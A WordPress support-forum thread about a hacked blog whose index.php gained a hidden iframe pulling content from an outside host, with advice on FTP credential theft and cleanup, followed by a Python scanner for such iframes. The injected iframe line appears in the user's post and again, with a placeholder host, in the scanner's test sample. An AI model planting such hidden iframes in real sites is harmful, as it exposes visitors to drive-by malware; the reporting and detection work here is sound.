Website hack (4 posts)

  1. nazcar
    Member
    Posted 4 months ago #

    Two of my WordPress self-hosted blogs were hacked. The index.php file was altered. Did anyone experience this?

    Original:

    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?>
    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-
    <iframe src="http://u1w.in:8080/ts/in.cgi?pepsi112" width=125 height=125 style="visibility: hidden"></iframe>

    My blogs are working fine now.
    How to increase the security so it won't be altered/hacked again?
    My previous permission was 644 then I changed it now to 444.

  2. samboll
    moderator
    Posted 4 months ago #

  3. nazcar
    Member
    Posted 4 months ago #

    Thanks. The reason I am not upgrading is because my plugins are not updated or may not be supported in the latest WP update. I guess I'll sacrifice those plugins for now because of these attacks.

  4. UseShots
    Member
    Posted 4 months ago #

    Hardening WordPress is a good thing. Unfortunately, it won't help in this particular case.

    This iframe is injected using FTP credentials stolen from your local computer.

    So make sure to scan your computer for malware.
    Once you are sure your computer is clean, change FTP passwords.
    And don't save passwords inside your FTP program if you don't want them to be stolen again.

    Here you can find more information about this attack:
    http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-prevalent/
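
A check for the kind of injection shown in the first post, as an added example that is not part of the original thread: it walks a web root and reports iframes that load from another host and are styled to be invisible. The function names, the file suffix list and the placeholder host `attacker.example` are assumptions made for this sketch.

```python
import re
import tempfile
from pathlib import Path

# Matches an opening <iframe ...> tag and captures its attribute string.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Styling that hides the frame from the visitor.
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
# A width/height of 0 or 1, quoted or not, is another way to hide a frame.
TINY_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?[01](?![\d%])", re.IGNORECASE)
# A src that points at another host (absolute or protocol-relative URL).
REMOTE_SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?(?:https?:)?//", re.IGNORECASE)

def find_hidden_iframes(text):
    """Return (line_number, tag) for each remote iframe styled to be invisible."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = m.group(1)
        hidden = HIDDEN_RE.search(attrs) or TINY_RE.search(attrs)
        if REMOTE_SRC_RE.search(attrs) and hidden:
            hits.append((text.count("\n", 0, m.start()) + 1, m.group(0)))
    return hits

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Scan every matching file under root; return {relative path: hits}."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

def demo():
    """Build a constructed two-file web root and scan it."""
    clean = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n?>\n"
    # Constructed sample: the host is a placeholder, not taken from a real incident.
    infected = clean + ('<iframe src="http://attacker.example:8080/in.cgi?x" '
                        'width=125 height=125 style="visibility: hidden"></iframe>\n')
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text(infected)
        Path(root, "wp-blog-header.php").write_text(clean)
        return scan_tree(root)

if __name__ == "__main__":
    for name, hits in demo().items():
        for line, tag in hits:
            print(f"{name}:{line}: {tag}")
```

A hit only shows that a file was modified; since the files here were changed over FTP, the scan complements the malware scan and password change described above rather than replacing them.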
